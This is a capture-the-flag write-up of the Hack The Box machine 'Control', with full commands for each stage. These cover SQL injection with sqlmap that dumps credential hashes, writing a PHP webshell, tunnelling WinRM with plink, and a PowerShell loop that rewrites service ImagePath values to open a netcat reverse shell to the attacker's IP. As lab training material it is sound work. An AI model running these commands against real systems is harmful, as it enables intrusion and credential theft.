Control

Control is a hard difficulty windows box that takes on Active Directory as well as registry misconfigurations

Recon

we start off by scanning Control's IP 10.10.10.167 with nmap

nmap -T4 -A -v 10.10.10.167

From our scan we get the following results

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC

We find that we have HTTP MySQL & RPC running.

Doing a dirbust we find a admin.php page that we cannot access it with the errorAccess Denied: Header Missing. Please ensure you go through the proxy to access this pageGoing through the webpage's source code however we find a reference to a local IP on the machine

<!-- To Do: 
     — Import Products 
     — Link to new payment system 
     — Enable SSL (Certificates location \\192.168.4.28\myfiles) 
<!-- Header -->

Armed with this information we can find that we need to have a proxy header to get to the page

Going through all Proxy Headers we find that X-Forwarded-For: 192.168.4.28 is our winning combination.

We can include this on our Burp requests to traverse the page.

After a little searching around we see that the website conducts some basic CURD operations but in addition to this also does searches. After trying basic SQLi on all fields we find that the search field is vulnerable.

Doing a basic union select 1, database(), user(),1,1,1-- -

Gives us a output

Great! we now have the DB Name warehouse and a user manager

With this we can go ahead and launch SQLMap

sqlmap -u 10.10.10.167/admin.php -H “X-Forwarded-For: 192.168.4.28” --all
database management system users password hashes:
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

From this we're able to pull some user hashes cracking them we get

hector:l33th4x0rhector
manager:l3tm3!n

Jumping deeper with SQLMap 

sqlmap -u http://control.htb/search_products.php --data="productName=*" --headers="X-Forwarded-For:192.168.4.28" --dbms=MySQL --technique=U --privileges
'manager'@'localhost' [1]:
    privilege: FILE

We find that we can use SQLMap to write files for this we'll once again rely on a webshell we've used multiple times before https://github.com/WhiteWinterWolf/wwwolf-php-webshell

sqlmap -u 10.10.10.167/search_products.php -H "X-Forwarded-For: 192.168.4.28" --forms --crawl=2 --file-write=/root/HTB/Control/wwwolf-php-webshell/webshell.php --file-dest=C:/inetpub/wwwroot/pizza.php --batch

Great now that we have a shell we can work on getting a full shell

Exploit

After running ipconfig we see that WinRM is running locally, luckily we can do port forwarding and access it on our machine, to do this we'll use plink so we upload plink and make sure ssh is running on our system after this we can 

.\plink.exe -l pizza -pw pizza -R 5985:127.0.0.1:5985 10.10.14.74

And

evil-winrm -i 127.0.0.1 -u hector -p 'l33th4x0rhector' -s ./ -e ./

And with that we have user!

Post Exploitation

Searching around the machine we don't find any obvious paths to priv esc, however running 

Get-PSReadlineOption

C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Gives us the powershell console history location, and reading this gives us 

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

Not immediately obvious but from this we can see that privilege escalation via registry is the way https://attack.mitre.org/techniques/T1058/

From here we can put together a list of all services in Registry like

.NET CLR Data
.NET CLR Networking
.NET CLR Networking 4.0.0.0
.NET Data Provider for Oracle
.NET Data Provider for SqlServer
.NET Memory Cache 4.0
.NETFramework
1394ohci
3ware
ACPI
AcpiDev
acpiex
acpipagr
AcpiPmi
acpitime
ADOVMPPackage
ADP80XX
adsi
ADWS
AFD
afunix
ahcache
AJRouter
ALG
AmdK8
AmdPPM
amdsata
amdsbs
amdxata
AppHostSvc
AppID
AppIDSvc
Appinfo
applockerfltr
AppMgmt
AppReadiness
AppVClient
AppvStrm
AppvVemgr
AppvVfs
AppXSvc
arcsas
AsyncMac
atapi
AudioEndpointBuilder
Audiosrv
AxInstSV
b06bdrv
bam
BasicDisplay
BasicRender
BattC
bcmfn2
Beep
bfadfcoei
bfadi
BFE
bindflt
BITS
bowser
BrokerInfrastructure
BTAGService
BthAvctpSvc
BthEnum
BthLEEnum
BthMini
BTHPORT
bthserv
BTHUSB
bttflt
buttonconverter
bxfcoe
bxois
camsvc
CapImg
CaptureService
CaptureService_4248c
CaptureService_4b5c3
CaptureService_80d08
CaptureService_ee306
cbdhsvc
cbdhsvc_4248c
cbdhsvc_4b5c3
cbdhsvc_80d08
cbdhsvc_ee306
cdfs
CDPSvc
CDPUserSvc
CDPUserSvc_4248c
CDPUserSvc_4b5c3
CDPUserSvc_80d08
CDPUserSvc_ee306
cdrom
CertPropSvc
cht4iscsi
cht4vbd
CldFlt
CLFS
ClipSVC
clr_optimization_v4.0.30319_32
clr_optimization_v4.0.30319_64
CmBatt
CNG
cnghwassist
coherence
CompositeBus
COMSysApp
condrv
ConsentUxUserSvc
ConsentUxUserSvc_4248c
ConsentUxUserSvc_4b5c3
ConsentUxUserSvc_80d08
ConsentUxUserSvc_ee306
CoreMessagingRegistrar
CoreUI
crypt32
CryptSvc
CSC
CscService
dam
DCLocator
DcomLaunch
defragsvc
DeviceAssociationService
DeviceInstall
DevicePickerUserSvc
DevicePickerUserSvc_4248c
DevicePickerUserSvc_4b5c3
DevicePickerUserSvc_80d08
DevicePickerUserSvc_ee306
DevicesFlowUserSvc
DevicesFlowUserSvc_4248c
DevicesFlowUserSvc_4b5c3
DevicesFlowUserSvc_80d08
DevicesFlowUserSvc_ee306
DevQueryBroker
Dfs
Dfsc
DFSR
Dhcp
diagnosticshub.standardcollector.service
DiagTrack
Disk
DmEnrollmentSvc
dmvsc
dmwappushservice
DNS
Dnscache
DoSvc
dot3svc
DPS
drmkaud
DsmSvc
DsSvc
DXGKrnl
e1iexpress
Eaphost
ebdrv
EFS
EhStorClass
EhStorTcgDrv
elxfcoe
elxstor
embeddedmode
EntAppSvc
ErrDev
ESENT
EventLog
EventSystem
exfat
fastfat
fcvsc
fdc
fdPHost
FDResPub
FileCrypt
FileInfo
Filetrace
flpydisk
FltMgr
FontCache
FrameServer
FsDepends
Fs_Rec
gencounter
genericusbfn
GPIOClx0101
gpsvc
GraphicsPerfSvc
HdAudAddService
HDAudBus
HidBatt
hidinterrupt
hidserv
HidUsb
HomeGroupListener
HpSAMD
HTTP
hvcrash
HvHost
hvservice
HwNClx0101
hwpolicy
hyperkbd
HyperVideo
i8042prt
iaLPSSi_GPIO
iaLPSSi_I2C
iaStorAVC
iaStorV
ibbus
icssvc
IKEEXT
IndirectKmd
inetaccs
InetInfo
InstallService
intelide
intelpep
intelppm
iorate
IpFilterDriver
iphlpsvc
IPMIDRV
IPNAT
IPsecGW
IPT
isapnp
iScsiPrt
ItSas35i
kbdclass
kbdhid
kdnic
KeyIso
KPSSVC
KSecDD
KSecPkg
ksthunk
KtmRm
LanmanServer
LanmanWorkstation
ldap
lfsvc
LicenseManager
lltdio
lltdsvc
lmhosts
Lsa
LSI_SAS
LSI_SAS2i
LSI_SAS3i
LSI_SSS
LSM
luafv
MapsBroker
MariaDB
mausbhost
mausbip
megasas
megasas2i
megasas35i
megasr
Microsoft_Bluetooth_AvrcpTransport
mlx4_bus
MMCSS
Modem
monitor
mouclass
mouhid
mountmgr
mpsdrv
mpssvc
mrxsmb
mrxsmb20
MsBridge
MSDTC
MSDTC Bridge 4.0.0.0
Msfs
msgpiowin32
mshidkmdf
mshidumdf
msisadrv
MSiSCSI
msiserver
MSKSSRV
MsLbfoProvider
MsLldp
MSPCLOCK
MSPQM
MsRPC
MSSCNTRS
MsSecFlt
mssmbios
MSTEE
MTConfig
Mup
mvumis
napagent
NcaSvc
NcbService
ndfltr
NDIS
NdisCap
NdisImPlatform
NdisTapi
Ndisuio
NdisVirtualBus
NdisWan
ndiswanlegacy
ndproxy
NetAdapterCx
NetBIOS
NetbiosSmb
NetBT
Netlogon
Netman
netprofm
NetSetupSvc
NetTcpPortSharing
netvsc
netvscvfpp
NgcCtnrSvc
NgcSvc
NlaSvc
Npfs
npsvctrig
nsi
nsiproxy
Ntfs
Null
nvdimm
nvraid
nvstor
Parport
partmgr
PcaSvc
pci
pciide
pcmcia
pcw
pdc
PEAUTH
percsas2i
percsas3i
PerfDisk
PerfHost
PerfNet
PerfOS
PerfProc
PhoneSvc
PimIndexMaintenanceSvc
PimIndexMaintenanceSvc_4248c
PimIndexMaintenanceSvc_4b5c3
PimIndexMaintenanceSvc_80d08
PimIndexMaintenanceSvc_ee306
PktMon
pla
PlugPlay
pmem
PNPMEM
PolicyAgent
PortProxy
Power
PptpMiniport
PrintNotify
PrintWorkflowUserSvc
PrintWorkflowUserSvc_4248c
PrintWorkflowUserSvc_4b5c3
PrintWorkflowUserSvc_80d08
PrintWorkflowUserSvc_ee306
Processor
ProfSvc
Psched
PushToInstall
pvscsi
qebdrv
qefcoe
qeois
ql2300i
ql40xx2i
qlfcoei
QWAVE
QWAVEdrv
Ramdisk
RasAcd
RasAgileVpn
RasAuto
RasGre
Rasl2tp
RasMan
RasPppoe
RasSstp
rdbss
RDMANDK
rdpbus
RDPDR
RDPNP
RDPUDD
RdpVideoMiniport
ReFS
ReFSv1
RemoteAccess
RemoteRegistry
RFCOMM
rhelfltr
rhelnet
rhelscsi
rhproxy
RmSvc
RpcEptMapper
RpcLocator
RpcSs
RSoPProv
rspndr
s3cap
sacdrv
sacsvr
SamSs
sbp2port
SCardSvr
ScDeviceEnum
scfilter
Schedule
scmbus
SCPolicySvc
sdbus
SDFRd
sdstor
seclogon
SecurityHealthService
SEMgrSvc
SENS
Sense
SensorDataService
SensorService
SensrSvc
SerCx
SerCx2
Serenum
Serial
sermouse
SessionEnv
sfloppy
SgrmAgent
SgrmBroker
SharedAccess
ShellHWDetection
shpamsvc
SiSRaid2
SiSRaid4
SmartPqi
SmartSAMD
smbdirect
smphost
SMSvcHost 4.0.0.0
SNMP
SNMPTRAP
spaceport
SpbCx
Spooler
sppsvc
srv2
srvnet
SSDPSRV
ssh-agent
SstpSvc
StateRepository
stexstor
stisvc
storahci
storflt
stornvme
storqosflt
StorSvc
storufs
storvsc
svsvc
swenum
swprv
Synth3dVsc
SysMain
SystemEventsBroker
TabletInputService
tapisrv
Tcpip
Tcpip6
TCPIP6TUNNEL
tcpipreg
TCPIPTUNNEL
tdx
terminpt
TermService
Themes
TieringEngineService
TimeBrokerSvc
TokenBroker
toolsrv
TPM
TrkWks
TrustedInstaller
TSDDD
TsUsbFlt
TsUsbGD
tsusbhub
tunnel
tzautoupdate
UALSVC
UASPStor
UcmCx0101
UcmTcpciCx0101
UcmUcsi
UcmUcsiAcpiClient
UcmUcsiCx0101
Ucx01000
UdeCx
udfs
UEFI
UevAgentDriver
UevAgentService
Ufx01000
UfxChipidea
ufxsynopsys
UGatherer
UGTHRSVC
umbus
UmPass
UmRdpService
UnistoreSvc
UnistoreSvc_4248c
UnistoreSvc_4b5c3
UnistoreSvc_80d08
UnistoreSvc_ee306
upnphost
UrsChipidea
UrsCx01000
UrsSynopsys
usbccgp
usbehci
usbhub
USBHUB3
usbohci
usbprint
usbser
USBSTOR
usbuhci
usbvideo
USBXHCI
UserDataSvc
UserDataSvc_4248c
UserDataSvc_4b5c3
UserDataSvc_80d08
UserDataSvc_ee306
UserManager
UsoSvc
VaultSvc
vdrvroot
vds
VerifierExt
VGAuthService
vhdmp
vhf
vm3dmp
vm3dmp-debug
vm3dmp-stats
vm3dmp_loader
vmbus
VMBusHID
vmci
vmgid
vmhgfs
vmicguestinterface
vmicheartbeat
vmickvpexchange
vmicrdv
vmicshutdown
vmictimesync
vmicvmsession
vmicvss
VMMemCtl
vmmouse
vmrawdsk
VMTools
vmusbmouse
vmvss
vmwefifw
vmxnet3ndis6
volmgr
volmgrx
volsnap
volume
vpci
VPCMap
vsmraid
vsock
VSS
VSTXRAID
vwifibus
W32Time
w3logsvc
W3SVC
WaaSMedicSvc
WacomPen
WalletService
wanarp
wanarpv6
WarpJITSvc
WAS
WbioSrvc
wcifs
Wcmsvc
wcnfs
WdBoot
Wdf01000
WdFilter
WdiServiceHost
WdiSystemHost
WdmCompanionFilter
WdNisDrv
WdNisSvc
Wecsvc
WEPHOSTSVC
wercplsupport
WerSvc
WFPLWFS
WiaRpc
WIMMount
WinDefend
Windows Workflow Foundation 4.0.0.0
WindowsTrustedRT
WindowsTrustedRTProxy
WinHttpAutoProxySvc
WinMad
Winmgmt
WinNat
WinQuic
WinRM
Winsock
WinSock2
WINUSB
WinVerbs
wisvc
WlanSvc
wlidsvc
WmiAcpi
WmiApRpl
wmiApSrv
WMPNetworkSvc
Wof
workerdd
WPDBusEnum
WpdUpFltr
WpnService
WpnUserService
WpnUserService_4248c
WpnUserService_4b5c3
WpnUserService_80d08
WpnUserService_ee306
ws2ifsl
WSearch
WSearchIdxPi
wuauserv
WudfPf
WUDFRd
xmlprov
{60E8E863-2974-47D1-89E0-E507677AA14F}
{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}

And prepare a little script to go through this and find our vulnerable service

foreach($s in Get-Content .\service.txt) { Set-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Services\$s\" -Name ImagePath -Value "cmd /k C:/Windows/Temp/nc.exe 10.10.14.74 6464 -e powershell.exe"; Start-Service "$s" }

And voila we have root!

Useful Links

https://github.com/redcanaryco/atomic-red-team

PreviousMangoNextOpenAdmin

Last updated